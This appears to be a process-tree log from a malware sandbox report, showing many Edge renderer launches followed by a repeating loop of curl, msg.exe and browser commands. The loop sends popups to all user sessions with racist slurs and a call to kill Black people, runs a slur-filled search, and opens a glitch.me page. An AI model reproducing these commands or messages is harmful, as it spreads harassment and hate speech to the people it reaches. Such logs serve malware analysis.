C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11828,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11832 /prefetch:15⤵PID:7108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=12024,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12036 /prefetch:15⤵PID:6376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11864,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12184 /prefetch:15⤵PID:6588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12368,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12384 /prefetch:15⤵PID:6572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12528,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:15⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12720,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12776 /prefetch:15⤵PID:6148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12936,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12916 /prefetch:15⤵PID:7188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13256,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13280 /prefetch:15⤵PID:7464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13532,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13540 /prefetch:15⤵PID:7704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13696,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13704 /prefetch:15⤵PID:8116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=13708,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13924 /prefetch:15⤵PID:7332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=13904,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14080 /prefetch:15⤵PID:7648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=14324,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14400 /prefetch:15⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=14524,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14520 /prefetch:15⤵PID:7236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14720,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14232 /prefetch:15⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=14892,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14704 /prefetch:15⤵PID:7560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=15400,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=15424 /prefetch:15⤵PID:7652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15864,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=15852 /prefetch:15⤵PID:7636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=16040,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16024 /prefetch:15⤵PID:7532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=16280,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16288 /prefetch:15⤵PID:7584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=16504,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16520 /prefetch:15⤵PID:7536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=16540,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16684 /prefetch:15⤵PID:8216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=16880,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16864 /prefetch:15⤵PID:8396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=17056,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17076 /prefetch:15⤵PID:8676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17252,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17232 /prefetch:15⤵PID:8904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=17432,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17448 /prefetch:15⤵PID:9176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=17608,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17616 /prefetch:15⤵PID:8408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=17872,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17880 /prefetch:15⤵PID:8656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=18084,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17612 /prefetch:15⤵PID:9036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=17936,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18260 /prefetch:15⤵PID:8340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=18412,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18404 /prefetch:15⤵PID:8844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=18556,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18592 /prefetch:15⤵PID:8308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=18740,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17860 /prefetch:15⤵PID:8860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=18920,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18904 /prefetch:15⤵PID:8864
-
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3368
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5152
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2464
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4796
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1420
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:484
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5448
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5492
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1196
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4888
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4520
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4100
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1136
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2352
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6064
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:320
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:664
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3720
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1276
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5640
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:396
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4396
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:956
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3088
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4188
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:752
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4688
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2224
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1600
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4828
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5772
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3284
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4500
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4444
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:484
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4644
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1196
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1792
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3628
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3352
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3488
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4344
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:420
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5996
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4624
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2556
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2340
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5736
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5516
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4352
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1536
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3900
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2976
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2060
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2836
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4708
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2568
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2916
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4616
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5900
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4620
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1492
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3000
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3056
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:760
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1412
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5700
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4140
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5952
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2888
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5892
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2104
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2620
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5700
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3704
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4140
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3344
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2556
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1940
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4448
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1140
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5192
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2636
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4856
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2816
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5192
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2976
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5916
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1124
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3756
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5192
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6240
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6256
-
-
